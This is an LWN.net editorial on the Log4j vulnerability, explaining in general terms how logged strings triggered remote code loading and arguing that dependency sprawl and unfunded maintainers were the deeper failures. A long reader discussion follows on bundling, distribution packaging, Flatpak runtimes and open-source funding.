Lessons from Log4j
What went wrong
There are a lot of articles describing the mechanics of this bug and how to exploit it in great detail; see this page for an extensive collection. In short: Log4j™ is a Java logging package trademarked and distributed by the Apache Software Foundation. It has found its way into many other projects and can be found all over the Internet. Indeed, according to this article, Log4j has been downloaded over 28 million times — in the last four months — and is a dependency for nearly 7,000 other projects. So a vulnerability in Log4j is likely to become a vulnerability in many other systems that happen to use it.
As the Apache Software Foundation proudly tweeted in June, it's even on the Ingenuity helicopter on Mars.
Normally, one thinks that a logging utility should accept data of interest and reliably log it. Log4j seemingly does this, but it also does something that, arguably, no logging system should do: it actively interprets the data to be logged and acts upon it. One thing it can do is query remote servers for data and include that in the log message. For example, it can obtain and incorporate data from an LDAP server, a feature that might be useful when one wishes to add data to the log that includes information about a user's account.
It turns out, though, that the remote directory server can supply other things, including serialized Java objects that will be reconstituted and executed. That turns this feature into a way to inject code into the running application that, presumably, only wanted to log some data. To exploit this opening, an attacker needs to do two things:
- Put up a server running a suitable protocol in a place where the target system can reach it. LDAP seems to be the protocol of choice at the moment, but others are possible; a grep of LWN's logs shows attempts to use DNS as well.
- Convince the target system to log an attacker-supplied string containing the incantation that will load and execute the object from the malicious server.
The second step above is often easier than it might seem; many systems will happily log user-supplied data. The hostile string may take the form of a user name that ends up in the log; the browser's user-agent string also seems to be a popular choice. Once the target takes the bait and logs the malicious string, the game is over.
This is, in other words, a case of interpreting unsanitized data supplied by the Internet, with predictable consequences; it is a failure that should have been caught in any reasonable review process. Note that the malicious strings can also be passed by front-end software to internal systems, which might then decide to log it. In other words, not being directly exposed to the Internet is not necessarily a sufficient defense for vulnerable systems. Every system using Log4j needs to be fixed, either by upgrading or by applying one of the other mitigations found in the above-linked article. Note that the initial fixes have proved to be insufficient to address all of the problems in Log4j; users will need to stay on top of the ongoing stream of updates.
The reaction to this vulnerability has been swift and strong. Some commenters are asserting that "open source is broken". Anybody who hadn't seen xkcd #2347 before has probably encountered it by now. Has our community failed as badly as some would have it? In short, there would appear to be two broad shortcomings highlighted by this episode, relating to dependencies and maintainers.
Dependencies galore
In the early days of free software, there simply was not much free code out there, so almost everything had to be written from scratch. At that time, thus, there were few vulnerable packages available for free download and use, so every project had to code up its own security bugs. The community rose to the challenge and, even in those more innocent days, security problems were in anything but short supply.
For as long as your editor has been in this field — rather longer than he cares to admit — developers and academics both have talked about the benefits of reusable software. Over the years, that dream has certainly been accomplished. Many language communities have accumulated a massive collection of modules for many common (and uncommon) tasks; writing a program often just becomes an exercise in finding the right modules and gluing them together correctly. Interfaces to repositories automate the process of fetching the necessary modules (and the modules they depend on). For those of us who, long ago, became used to the seemingly infinite loop of running configure then tracking down the next missing dependency, modern environments seem almost unfair. The challenge is gone.
This is a huge success for our community; we have created development environments that can be a joy to work within, and which allow us to work at a level of productivity that couldn't really be imagined some decades ago. There is a problem lurking here, though: this structure makes it easy for a project to accumulate dependencies on outside modules, each of which may bring some risks of its own. When you are, essentially, importing random code off the Internet into your own program, any of a number of things can happen. One of those modules could be overtly hostile (as happened with event-stream), it could simply vanish (left-pad), or it could just suffer from neglect, as appears to have happened with Log4j.
When the quality of the things one consumes is of concern, one tends to fall back to known brands. Log4j is developed under the Apache Software Foundation brand which, one might hope, would be an indicator of quality and active maintenance. Appearances can be deceiving, though; one need not look further than Apache OpenOffice, which continues to be downloaded and used despite having been almost entirely starved of development effort for years, for an example. OpenOffice users will be relieved to know, though, that (according to the project's October 2021 report) OpenOffice has finally managed to put together a new draft mission statement. Log4j is a bit more active than that, but it still depends on the free-time effort of unpaid maintainers. Apache brand or not, this project, which is widely depended on, has nobody paid to maintain it.
But, even if the brand signals were more reliable, the problem remains that it is hard to stay on top of hundreds of dependencies. A library that appeared solid and well maintained when it was adopted can look rather less appealing a year or two later, but projects lacking good maintenance often tend not to attract attention until something goes badly wrong. Users of such a project may not understand the increasing level of risk until it is too late. Our tooling makes adding dependencies easy (to the point that we may not even be aware of them); it is less helpful when it comes to assessing the maintenance state of our existing dependencies.
Maintainers
A related problem is lack of development and maintenance support for projects that are heavily depended on. The old comparison between free software and a free puppy remains on point; puppies are wonderful, but if somebody isn't paying attention they will surely pee on the carpet and chew up your shoes. It is easy to take advantage of the free-of-charge nature of free software to incorporate a wealth of capable code, but every one of those dependencies is a puppy that needs to be under somebody's watchful eye.
As a community, we are far better at acquiring puppies than we are at training them. Companies will happily take the software that is offered, without feeling the need to contribute back even to the most crucial components in their system. Actually, we all do that; there is no way for anybody to support every project that they depend on. We all get far more out of free software than we can possibly put back into it, and that is, of course, a good thing.
That said, there is also a case to be made that the corporate side of our ecosystem is too quick to take the bounty of free software for granted. If a company is building an important product or service on a piece of free software, it behooves that company to ensure that said software is well supported and, if need be, step up to make that happen. It is the right thing to do in general, but it is far from an altruistic act; the alternative is a continual stream of Log4j-like crises. Those, as many companies are currently discovering, are expensive.
"Stepping up" means supporting maintainers as well as developers; it is with maintainers that the problem is often most acute. Even a project like the Linux kernel, which has thousands of developers who are paid for their work, struggles to find support for maintainers. Companies, it seems, see maintainership work as overhead at best, helping competitors at worst, and somebody else's problem in any case. Few companies reward their employees for acting as maintainers, so many of them end up doing that work on their own time. The result is projects with millions of downloads whose maintenance is done in somebody's free time — if it is done at all.
These problems are not specific to free software; discovering that a piece
of proprietary software is not as well supported as was claimed is far from
unheard of. Free software, at least, can be fixed even in the absence of
cooperation from its creators. But the sheer wealth of software created by
our community makes some of these problems worse; there is a massive amount
of code to maintain, and little incentive for many of its users to help
make that happen. We will presumably get a handle on these issues at some
point, but it's not entirely clear how; until that happens, we'll continue
deploying minimally supported software to Mars (and beyond).
Posted Dec 16, 2021 17:26 UTC (Thu)
by beckmi (subscriber, #87001)
[Link] (2 responses)
Posted Dec 16, 2021 23:09 UTC (Thu)
by benhoyt (subscriber, #138463)
[Link] (1 responses)
Posted Dec 17, 2021 10:17 UTC (Fri)
by georgm (subscriber, #19574)
[Link]
Posted Dec 16, 2021 17:49 UTC (Thu)
by dskoll (subscriber, #1630)
[Link] (3 responses)
OpenOffice has finally managed to put together a new draft mission statement
Burn... :)
Posted Dec 16, 2021 17:55 UTC (Thu)
by smurf (subscriber, #17840)
[Link] (1 responses)
Posted Dec 16, 2021 20:22 UTC (Thu)
by NYKevin (subscriber, #129325)
[Link]
Posted Dec 17, 2021 8:51 UTC (Fri)
by thoeme (subscriber, #2871)
[Link]
Posted Dec 16, 2021 18:13 UTC (Thu)
by pj (subscriber, #4506)
[Link] (1 responses)
Companies see it that way because developers see it that way: most developers consider their job to be 'writing code'... but it's more than that: it's debugging, it's testing, it's ticket-status updates (be it a bug ticket or a feature 'ticket'), it's code review (really just a form of pre-emptive debugging), etc. While writing code may be the most enjoyable part of the job - who doesn't like a good dose of flow state? - it's certainly not the _entire_ job, and that message needs to be spread around more.
Posted Dec 16, 2021 21:40 UTC (Thu)
by hkario (subscriber, #94864)
[Link]
I'm sure that there are dozens upon dozes of similarly under-maintained proprietary libraries in the corporate world, but because they're closed source, nobody is looking for bugs in them, and even if the "red team" does find it, hardly anyone will learn that lack of maintenance was the root cause.
Posted Dec 16, 2021 18:21 UTC (Thu)
by rgmoore (✭ supporter ✭, #75)
[Link] (1 responses)
I just wanted to highlight this aside as an example of the kind of thing that keeps me a subscriber. The wit is very dry, but we do notice and enjoy it. Keep up the good work!
Posted Dec 21, 2021 11:00 UTC (Tue)
by fmyhr (subscriber, #14803)
[Link]
All the same, I wish our Editor could have worked in the name (and better a link) to LibreOffice. The dig at OO was very much deserved, but perhaps too subtle to those unfamiliar with the situation. Which, let's face it, could be any reader -- given how large the "firehose" has become.
Posted Dec 16, 2021 19:09 UTC (Thu)
by mtaht (subscriber, #11087)
[Link] (3 responses)
Posted Dec 17, 2021 9:38 UTC (Fri)
by LtWorf (subscriber, #124958)
[Link] (2 responses)
Posted Dec 18, 2021 23:40 UTC (Sat)
by NYKevin (subscriber, #129325)
[Link] (1 responses)
Posted Dec 20, 2021 18:29 UTC (Mon)
by jengelh (guest, #33263)
[Link]
Posted Dec 16, 2021 19:32 UTC (Thu)
by cyperpunks (subscriber, #39406)
[Link] (8 responses)
https://twitter.com/isotopp/status/1470668771962638339
Posted Dec 16, 2021 22:41 UTC (Thu)
by noxxi (subscriber, #4994)
[Link] (4 responses)
It is not that log4j enables the code execution - it is instead the permissive design of JNDI combined with the powerful und known problematic object deserialization of Java. None of this is new - log4j just made it more accessible for exploits. It wasn't the first time that these mechanisms were found exploitable and I doubt it will be the last time.
Posted Dec 17, 2021 13:39 UTC (Fri)
by developer122 (guest, #152928)
[Link] (1 responses)
Posted Dec 18, 2021 19:18 UTC (Sat)
by ms-tg (subscriber, #89231)
[Link]
Posted Dec 17, 2021 13:43 UTC (Fri)
by k3ninho (subscriber, #50375)
[Link] (1 responses)
The best response to this is to talk about user/attacker-supplied data as something you expect to be an attack vector, set the expectation that we restrict the processing of that input data to simple substitutions. Talk about the Chomsky Hierarchy, with strong warnings against Turing Completeness, so that people don't create processing of hostile data that's exploitable. If we talk about those things, the cultural expectations change so people will ask "how can this user-supplied input work against me?"
K3n.
Posted Dec 18, 2021 2:21 UTC (Sat)
by ssmith32 (subscriber, #72404)
[Link]
And you do need to be running a version of the JVM/JDK (1.8, and actually a few patch versions behind the latest 1.8), that has been deprecated / unsupported for a few years now.
At least to exploit it in the fashion being described everywhere. Later versions of the JVM/JDK reportedly are still vulnerable, but you need to use in memory gadgets, which is a bit harder then running code off an LDAP server you host.
Although I have to wonder how many attackers set up a LDAP server to host their attacks... that was running on an old version of the JVM.. that used log4j...
Posted Dec 18, 2021 2:23 UTC (Sat)
by ssmith32 (subscriber, #72404)
[Link] (1 responses)
Posted Dec 21, 2021 16:26 UTC (Tue)
by msw (guest, #3733)
[Link]
Posted Dec 16, 2021 20:15 UTC (Thu)
by erwaelde (subscriber, #34976)
[Link]
I'm not sure this is the whole thing. Reviewing or auditing "free(beer)" components from external is not high on the list of (project) management. In my humble opinion this is a big part of this mess.
Posted Dec 16, 2021 20:21 UTC (Thu)
by HenrikH (subscriber, #31152)
[Link] (13 responses)
Posted Dec 16, 2021 20:48 UTC (Thu)
by rahulsundaram (subscriber, #21946)
[Link] (4 responses)
Far less adoption would have made a large difference.
Posted Dec 17, 2021 9:04 UTC (Fri)
by eru (subscriber, #2753)
[Link] (1 responses)
On an alternate timeline with no open source, small shared components like log4j would not exist (never mind trivialities like the infamous left-pad). Licensing them would be too much bother, so purchases would be done only for larger pieces of software. Instead, companies would use the facilities in the OS or language runtime they use, and if not sufficient, roll their own.
In general, the alternate timeline would have less, and more expensive software. Hard to say if it would be of higher quality.
Posted Dec 28, 2021 15:40 UTC (Tue)
by jd (guest, #26381)
[Link]
I found a report from 2013 which states: "Code quality for open source software continues to mirror code quality for proprietary software: For the second consecutive year, code quality for both open source and proprietary software code was better than the generally accepted industry standard defect density for good quality software of 1.0. defect density (defects per 1,000 lines of code, a commonly used measurement for software quality). Open source software averaged a defect density of .69, while proprietary code (a random sampling of code developed by enterprise users) averaged .68."
Open Source did better, according to another report. "In fact, the most recent report (2013) found open source software written in C and C++ to have a lower defect density than proprietary code. The average defect density across projects of all sizes was 0.59 for open source, and 0.72 for proprietary software.
Yet other reports give other figures. "Defect density (defects per 1,000 lines of code) of open source code and commercial code has continued to improve since 2013: When comparing overall defect density numbers between 2013 and 2014, the defect density of both open source code and commercial code has continued to improve. Open source code defect density improved from 0.66 in 2013 to 0.61 in 2014, while commercial code defect density improved from 0.77 to 0.76."
Bear in mind that all three reports are basing their 2013 figures on the same 2013 analysis by Coverity and all three manage to give different numbers. Since the link to Coverity's report no longer works, I cannot tell you if any of them are correct.
Nonetheless, two of the three give better defect density levels to open source software, with the third being essentially equal. We can certainly use that to say that the commercial software examined certainly wasn't better and may have been worse. Of course, a lot can happen in 8 years, almost 9, and I can't find anything later than 2014.
So if we can't rely on tech articles, maybe we can look at methodology. Power of Ten and the CERT Guidelines for Secure Software would seem logical places to start. I do not, personally, know anyone who adheres to either and I've worked for a decent selection of companies. However, anecdotal evidence isn't worth much and it could be that everywhere else on the planet does. It may be a decent selection, but it's not really random and it's certainly not verifiable. Are there any surveys out there? Then there are rulesets like MISRA, which has fans and haters.
PRQA seems to have been seized by Perforce and previously free-to-read coding standards now seem to be locked up, so I have no idea what they currently are. ( The 2005 JSF rules are here: https://www.stroustrup.com/JSF-AV-rules.pdf - if they're as rapidly developing as Lockheed-Martin imply in one online presentation, these are well out of date.) All I can tell you with any confidence is that no open source coder, and very few professionals, have bought the Perforce suite as their software control system and are using the code analyzer to spot defects. It may be possible to use Helix QAC with Git, but I don't see anything to indicate that.
What I'm getting out of this is that the scene is messy, that a fair amount of the advice is apocryphal or at least wildly inaccurate (so a great starting point for budding galactic hitchhikers), that very few people are using the tools that do exist and that even when everything meshes just right, nobody seems to know what the results are.
I do sincerely hope that it's not as bleak as all that, but I'm worried it might actually be worse.
Posted Dec 18, 2021 2:25 UTC (Sat)
by ssmith32 (subscriber, #72404)
[Link] (1 responses)
Posted Dec 18, 2021 10:06 UTC (Sat)
by Wol (subscriber, #4433)
[Link]
Recognise a Turing Machine for what it is - a security nightmare. And DON'T USE IT WHEN IT'S NOT APPROPRIATE.
Cheers,
Posted Dec 17, 2021 10:33 UTC (Fri)
by rsidd (subscriber, #2582)
[Link] (7 responses)
Posted Dec 17, 2021 14:55 UTC (Fri)
by ebassi (subscriber, #54855)
[Link] (6 responses)
Isn't that the entire point of "open source software" as opposed to "free software"?
Posted Dec 17, 2021 16:08 UTC (Fri)
by mathstuf (subscriber, #69389)
[Link] (5 responses)
Posted Dec 17, 2021 17:37 UTC (Fri)
by pebolle (guest, #35204)
[Link] (3 responses)
Exactly.
Free Software proponents are, or at least should, be fine with people only consuming Free Software. I think not contributing, not funding, not reporting bugs, etc. should be all acceptable to them. Their philosophy is that all software should be free.
Open Source's philosophy is that Open Source will lead to higher quality software.
From a Free Software perspective accidents like this are not special. Its supporters like bug-free software, just like everyone else! From an Open Source perspective accidents like this are more challenging. They are at odds with their philosophy.
Posted Dec 20, 2021 18:30 UTC (Mon)
by NYKevin (subscriber, #129325)
[Link] (1 responses)
Posted Dec 20, 2021 23:36 UTC (Mon)
by pebolle (guest, #35204)
[Link]
Am I reading you in bad faith if I say this translates to: if you open sourced harder it wouldn't have happened?
> Compared on equal terms, open source development is superior to proprietary development
I was taught that Open Source was a reaction to Free Software. Both are alternatives to proprietary software, of course, but Open Source should be evaluated on its promise to yield better results while Free Software on its promise to yield more freedom.
(I think LWN.net almost never covers software that is Open Source but not Free Software so let's ignore that niche.)
My point was that in cases like this, where (free and open) software turns out to be buggy the proponents of Open Source have some explaining to do. And open source harder explains very little as it will be always true.
Posted Dec 21, 2021 9:40 UTC (Tue)
by drnlmza (subscriber, #60245)
[Link]
Sure, not contributing back is fine, but there's also an corresponding "no warranty" clause in most licenses. The problem is no-one contributing back and everyone expecting that all problems will magically be fixed without any active effort, which is not how the world works.
Posted Dec 17, 2021 19:04 UTC (Fri)
by Wol (subscriber, #4433)
[Link]
There is an obligation to contribute *forward*, but that's subtly (and critically) different.
Cheers,
Posted Dec 16, 2021 20:38 UTC (Thu)
by bkw1a (subscriber, #4101)
[Link] (36 responses)
In the Windows and Mac world there's never been good package management, so this kind of thing is inevitable. It would be great if the current crisis encourages developers in that realm to think about how that can be improved.
But even in the Linux world we're leaning more and more on snaps and flatpaks, making such problems more likely there, too. These tools are great, but we need to think about the trade-offs and be prepared to deal with the consequences.
The problem is, we don't just have one unsupervised puppy, we have 101 dalmations.
Posted Dec 16, 2021 21:03 UTC (Thu)
by developer122 (guest, #152928)
[Link] (19 responses)
Posted Dec 17, 2021 7:43 UTC (Fri)
by ras (subscriber, #33059)
[Link] (18 responses)
It's a Linux distribution that afaict, is staffed mostly by sysadmin's.
Some sysadmins are so anal about the "fix once, update everywhere" thing they have rules like: all software installed on my production boxes is either written in house, or is installed via a .deb with the dependencies supplied by Debian packages. Don't have a .deb - make one yourself. With ed, if necessary.
Every so often a young wet behind the years programmer will insist to a wizened sysadmin this bureaucracy from last fortnight is stifling his creativity, and the wizened sysadmin's eyebrows will quiver, rising above his monitor so the bristles point straight towards the young'ins eyeballs, and with a long soft sigh in his voice he will say "get off my lawn and keep that attitude away from my metal, kid".
And the kid will do that just, setting up the smoothest and slickest web site you ever did see running completely serverless, and he will monitor everything with log4j, occasionally glancing at it with his ipady thingy while sipping coconut juice prepared by a sweet young thing in a shady spot with good 5G; and thusly and surely, his users private data will make its way to the dark corners of the web where they make good money trading such things.
And the newspapers will have headlines demanding justice and vengeance against the nerds who had the gall to create the systems the users love to use and do it in internet time. And then after due consideration another nerd will say "why don't we do fix once update everywhere?".
Posted Dec 17, 2021 8:13 UTC (Fri)
by joib (subscriber, #8541)
[Link] (15 responses)
Perhaps distros could engage in some introspection why developers have abandoned relying on the distro packages to the extent they have, and what could distros do about it? Bonus points if you can do it without the kneejerk CADT response.
Posted Dec 17, 2021 10:04 UTC (Fri)
by LtWorf (subscriber, #124958)
[Link] (3 responses)
Nobody will follow best practices if they are not enforced.
Of course product management is happier to bundle stuff, because it leads to being faster. And developers are fine with that because they won't need to learn how to package software.
Everyone is happy until disaster happens :D
Posted Dec 18, 2021 2:30 UTC (Sat)
by ssmith32 (subscriber, #72404)
[Link] (1 responses)
People have very different ideas of best practice..
Posted Dec 18, 2021 16:30 UTC (Sat)
by LtWorf (subscriber, #124958)
[Link]
On the other hand version pinning makes sure that security fixes will never reach your product.
Posted Dec 18, 2021 11:02 UTC (Sat)
by Wol (subscriber, #4433)
[Link]
(1) Because "best practice" often isn't.
That's why greybeards do it and newbies don't ...
Cheers,
Posted Dec 17, 2021 20:40 UTC (Fri)
by khim (subscriber, #9252)
[Link] (9 responses)
Even if is the reason for that phenomemon? Because it's the only way to create cross-distro and cross-version binary. And that's what you want both if you want to give you program to the user (most of which are not progammers and don't know how to compile anything) or if you want to use program in-house and retain the ability to upgrade OS without hassle (attempt to rely on distro-provided libraries would lead to pain with installation on upgraded OS because certain versions of certain libraries would become unavailable). An SDK. Some way to build binary which you may build once and use forever. Or, if not forever then at least for 5-10 years. That's what all OSes are providing, just not Linux distributions. That's the bare minimum. If you want to make sure developers wouldn't try to bundle libraries which are not in your base SDK then then would need some cross-distro and cross-version way to deliver other libraries. That's even harder, I don't know any OS which managed to pull that off. Flakpak is trying, AFAIK.
Posted Dec 18, 2021 11:31 UTC (Sat)
by joib (subscriber, #8541)
[Link] (1 responses)
Yes. Because insulting developers will only alienate developers further and ensures that whatever good points distros might have about maintainability and dependency management will fall on deaf ears.
> An SDK.
> Flakpak is trying, AFAIK.
Yes, something like that. Flatpak is probably the best shot in the desktop space.
In the server world, I don't know. Developers using "modern" languages really love things like cargo+crates.io/NPM/whatever, and for good reasons. The challenge is how to integrate those models with some trusted third party (call it a "distro" or whatever), that would ensure long-term maintenance and security updates for some particular versions of particular packages. Oh, and some kind of "apt-get upgrade" type mechanism to semi-automatically rebuild applications with bundled dependencies due to security updates in the dependencies.
Posted Dec 18, 2021 23:52 UTC (Sat)
by NYKevin (subscriber, #129325)
[Link]
For $DEITY's sake, even Steve Ballmer had this figured out. Remember the "Developers, developers, developers!" line? You could have the greatest operating system in the world, but it doesn't matter if nobody wants to write code for it.
Posted Dec 19, 2021 0:43 UTC (Sun)
by NYKevin (subscriber, #129325)
[Link] (6 responses)
In the proprietary world, this is a solved problem. It's called "You can't bundle it or else our lawyers will sue your pants off. Instead, every end user must download the package from upstream, which is installed in a single standard location, and if your OS/app/whatever doesn't like that standard location, then that's your problem."
Before anyone asks: New versions are handled as if they were entirely unrelated packages. You can easily end up with dozens of these "Microsoft C++ Redistributable" nonsense packages on a single Windows box.
Posted Dec 19, 2021 1:11 UTC (Sun)
by khim (subscriber, #9252)
[Link] (3 responses)
Except, of course, these runtimes not only can be bundled, but they were designed to be bundled from very early days. And yes, they, sometimes, needed crazy tricks to support these bundled runtimes. Yet you always had an option to bundle them and you still have that option even today. They only tried to push that approach after taking 90%+ of desktop. After they achieved, essentially, a monopoly. And even then the end result was near disaster: that's how they lost the title of leading desktop platform platform to the web (Ironically enough, after killing Netscape). And web, the platform that won the title of most popular platform on desktop, for now, is all about bundling dependencies. GNU/Linux never had a monopoly, yet it tried to put much harsher requirements on developers. This flew like a lead balloon: most apps today they are developed for web or Windows and macOS, only tiny percentage supports Linux.
Posted Dec 19, 2021 2:57 UTC (Sun)
by NYKevin (subscriber, #129325)
[Link] (2 responses)
Sometimes, there isn't even a reasonable way to determine whether the thing is already installed or not, so you end up doing extra-crazy things like re-running the same installer over and over again (see https://help.steampowered.com/en/faqs/view/2BED-4784-8C0A...).
Posted Dec 19, 2021 14:19 UTC (Sun)
by khim (subscriber, #9252)
[Link] (1 responses)
That was always an option, not the requirement. That's why, after you wrote that, I went and verified, that /MT is where it was always been. Even with just released Visual Studio 2022. Ah. Thanks for providing that link. Now, please go read what's written there yourself. Yes, with DirectX it's done like that. And, later, the trick was repeated with .NET framwork. But there are extremely important difference between what was done there and in Linux world. Microsoft decided from the very beginning that there would be one DirectX and one .NET runtime (later they added few more, but the original ones still are all supported). And they ensured that programs built for DirectX 1.0 (released in 1995, remember?) still would work today (there are some bugs which may prevent it, but there were no on-purpose breakage since 1995, for quarter-century). And when they had that promise they started working on legal enforcements. And yes that combination of technical and legal solutions works. What Linux libraries can you name which are supporting similar technical promises? GLibC? Well, congrats: even most super-duper-bundle-savvy apps very rarely bring their own version of GlibC. Even if, technically and legally, they can. The important part of the solution (outlined in the link you have shared, ironically enough) was not done for GLibC (there are no way to bring your own version of GlibC and install it), but glacial speed of development worked as an adequate substitute: GlibC is so low-level and changes so slowly that using 5 years old version is not too painful. Yeah, that's rare success. Of GlibC developers, not distro makers, though. Everyone else liked to play CADT games which made the desire of distro-makers to have just one copy of each library unrealistic: where there are no compatibility between versions there would be bundling… it's as simple as that. Yet distributors tried to fit that square peg into a round hole for decades… with very little success. I'm also guilty: I tried to help with creation of one local distribution, years ago, got fed up with all these incompatibilities (when we tried to somehow invent a way to run apps from RedHat on our distro) and switched back to Windows.
Posted Dec 20, 2021 18:36 UTC (Mon)
by NYKevin (subscriber, #129325)
[Link]
Side note: As someone who was actually diagnosed with AD(H)D, I really wish people would stop using my condition as a pejorative.
Or claiming that it doesn't exist, for that matter.
Posted Dec 19, 2021 13:36 UTC (Sun)
by smurf (subscriber, #17840)
[Link] (1 responses)
The Distribution approach ("there is exactly one copy of FooLib on the system which everybody uses, it gets security fixes only; if you need a newer copy you get to wait for the next distro release") may not be for everybody but at least it solves *that* problem.
Posted Dec 19, 2021 13:49 UTC (Sun)
by khim (subscriber, #9252)
[Link]
Of course there are ways to prevent that! Windows never had that problem in the first place. And Android implements a way solve it. Not sure what macOS is doing, but hope it's either avoided the problem in the first place (like Windows) or solved it (like Android). True. If your sausage is raw and under cooked then go and burn the whole house down. That sure would solve that issue: most likely you would have no sausage to worry about, but if it would, by some freak chance, survive then it would be well done.
Posted Dec 18, 2021 1:01 UTC (Sat)
by pabs (subscriber, #43278)
[Link]
Posted Dec 18, 2021 4:23 UTC (Sat)
by sionescu (subscriber, #59410)
[Link] (1 responses)
Posted Dec 19, 2021 14:28 UTC (Sun)
by khim (subscriber, #9252)
[Link]
Highly unlikely. More likely: they would be told to make sure CI/CD can run without internet access and that would be it. The solution is to take all the bazillion dependencies and put them into one repo. Then never update. You may guess how wonderfully this would improve security of the whole thing.
Posted Dec 16, 2021 21:44 UTC (Thu)
by hkario (subscriber, #94864)
[Link] (3 responses)
Posted Dec 17, 2021 20:46 UTC (Fri)
by khim (subscriber, #9252)
[Link] (2 responses)
That also makes sense. If you found a bug in a library you are using (not too serious like what you have in log4j thus without the need to rush and upgrade everything ASAP) and you have fixed it in the base version of package… then it may take years before you would be able to rely on that fix. And that just silly: you need to ship working program much sooner. Bundling is the obvious solution. Maybe not best solution although… well… what other solution is there? Bundle version which works and use system version if it's new enough? This leads to combinatorial explosion very quickly and makes everything unreproducible and untestable.
Posted Dec 21, 2021 15:16 UTC (Tue)
by Chousuke (subscriber, #54562)
[Link] (1 responses)
If you vendor dependencies, you assume full responsibility for monitoring those dependencies. With a distribution, you only need to monitor what the distribution does. A security issue in a dependency provided by the distribution is not on you to find and fix.
Sure, you might be limited to using older versions of some dependencies depending on which platforms you support. That is not automatically a downside.
Your software does not need to support every platform under the sun when run in production; it's perfectly fine to tell someone that you only provide upstream production support for eg. RHEL 8 or newer, Ubuntu 20.04 or newer, and nothing else.
If you're an open source project, you would publish releases in source form and let distributors take care of it; maybe engaging with a few platforms that you want to explicitly support to get your software packaged.
I don't know why it seems to be so common to think that once you write software it should run on some random hyper-customized Gentoo-NixOS frankenstein of a platform just because it's "Linux".
Posted Dec 21, 2021 18:55 UTC (Tue)
by khim (subscriber, #9252)
[Link]
Who would pay for it? No. Why should you? They are bundled, they don't change, they work. Most people (including most developers) spend maybe 5 minutes a year thinking about security. 15 is you lucky. You may not like it, but that's how it works. They can not (and wouldn't!) pick any solution which asks them to regularly “monitor” something. Thus they bundle dependencies since that works. As examples with Andoid/DirectX/ChromeOS shows they may accept unbundled solution where someone else monitors things But if you say “for this solution to work developers have to monitor XXX”… then it does't even matter what XXX is: developers can not and wouldn't monitor it. Period. Not even worth discussing. They are paid for to solve users problems not to monitor anything! What about most common type of software which is updated never and not supported unless something breaks and you are forced to visit freelance site and find someone who may fix it? Why shouldn't it? Any OS is only as good as software which it enables. And the majority of software is only ever written once, updated never and used till it breaks. Just one simple fact: there are more than 30 million businesses in US. And population is 330 million. Just what kind of software may typical business afford? Just think about it. The answer is: very simple one. Which requires maybe week of work of a software developer (but it would be nice if it would require less).
And then you come and say: you have to monitor that and you have to support this. How? Who would pay for that? Are you offering? For all these millions of businesses? And before you come and say that most of these businesses don't purchase any software. Of course they do! They have their own [tiny] web sites with some scripts cobbled together from Google Docs and some frankenstein on VPS. They have some scripts for Excel or Accees. All that is software, too. And, the most important part: there are no hard line which separates that software from something like WhatsApp. There are continuum of software between these hairy Excel scripts and auto-updating browser with dozens of software engineers. And the majority of software is closer to Excel scripts than to said browser. Even if scripts are built on top of JavaFX in a system which uses log4j.
Posted Dec 16, 2021 22:08 UTC (Thu)
by rgmoore (✭ supporter ✭, #75)
[Link] (1 responses)
It would indeed be great if people learned this, but this isn't the first time there's been a critical security flaw with a bundled dependency. If people didn't change after the last time this happened, it requires great optimism to think they'll change this time. There are deep reasons people like bundling, and we need to work on those reasons before they'll be convinced to change.
Posted Dec 19, 2021 11:44 UTC (Sun)
by farnz (subscriber, #17727)
[Link]
This is where good systems for handling bundling come into play. For example, Fedora RPMs that include bundled packages have metadata that indicates what you bundled, and what version is bundled.
On the developer side, Rust's Cargo tool is set up so that the easy way to bundle a dependency is to document it in your build metadata and ask Cargo to copy it in. This sort of thing makes it relatively manageable to unbundle dependencies - you know what was bundled (thanks to Cargo's metadata files), and can compare that to what you have bundled to see if there are hidden changes.
Posted Dec 17, 2021 5:38 UTC (Fri)
by bartoc (guest, #124262)
[Link] (1 responses)
I agree though, build systems really do need to support unbundling. Java build systems in particular are a nightmare though, some make autotools look genuinely simple and pleasant!
Posted Dec 17, 2021 16:47 UTC (Fri)
by seyman (subscriber, #1172)
[Link]
It would be great if applications that package dependencies could include a MANIFEST-like file that documents their depencies. For each one, it could state what version is bundled, if it has been modified from upstream's version and why it is bundled.
That alone would be a huge step forwards.
Posted Dec 17, 2021 8:12 UTC (Fri)
by nirbheek (subscriber, #54111)
[Link] (6 responses)
So if you install 5 apps using rpm and 10 apps with Flatpak, you will only have two copies of a library — except if an app requires an older runtime for compatibility reasons, but that's not a new problem.
Posted Dec 17, 2021 9:14 UTC (Fri)
by z3ntu (subscriber, #117661)
[Link] (2 responses)
Posted Dec 17, 2021 14:23 UTC (Fri)
by nirbheek (subscriber, #54111)
[Link] (1 responses)
For things like libssh2, I would want Flatpak / Flathub to have a system for checking whether multiple apps on the repo have the same dependency, so that it can either be added to an existing runtime, or a new runtime can be created that contains it. It might already have such a system, since it's easy to automatically detect it from the app manifests.
Posted Dec 17, 2021 16:48 UTC (Fri)
by nim-nim (subscriber, #34454)
[Link]
One man’s esoteric dependency is another’s must-have.
The JVM is the archetypical runtime, it bundles all kinds of features so Java devs need not use any esoteric dependency, fast forward a few decades and Java devs use everything except what is bundled (log4j is not the sole example).
The batteries included runtime model only works at first, when it is new and shiny and app dev interests are perfectly aligned with runtime dev interests (mainly because there is nothing else but the runtime to choose from).
Over time runtime devs will be reluctant to deprecate runtime parts (because of the installed base), they will clash with people proposing alternatives (because they, as official runtime devs, know best) so there is a natural drift of app devs towards “esoteric” runtime alternatives.
The ultimate result of a successful runtime is lots of people using esoteric deps (aka runtime alternatives). And that ultimate result is better served by a granular dependency system, not a battery-included model that posits perfect runtime dev and app dev alignment on the long run.
That’s not a reflection on specific human beings that’s how we behave in general.
Posted Dec 17, 2021 10:40 UTC (Fri)
by zdzichu (subscriber, #17118)
[Link] (2 responses)
Posted Dec 17, 2021 12:12 UTC (Fri)
by atnot (subscriber, #124910)
[Link] (1 responses)
Posted Dec 18, 2021 21:45 UTC (Sat)
by JanC_ (guest, #34940)
[Link]
It’s basically just insane to keep filling up disk space with (often unused!) runtimes.
Posted Dec 19, 2021 15:40 UTC (Sun)
by Herve5 (subscriber, #115399)
[Link]
Posted Dec 16, 2021 21:20 UTC (Thu)
by ibukanov (subscriber, #3942)
[Link] (2 responses)
Posted Dec 17, 2021 5:33 UTC (Fri)
by joib (subscriber, #8541)
[Link] (1 responses)
Posted Dec 18, 2021 23:06 UTC (Sat)
by gfernandes (subscriber, #119910)
[Link]
Needless to say, Logback is not vulnerable in the same way.
Posted Dec 17, 2021 7:07 UTC (Fri)
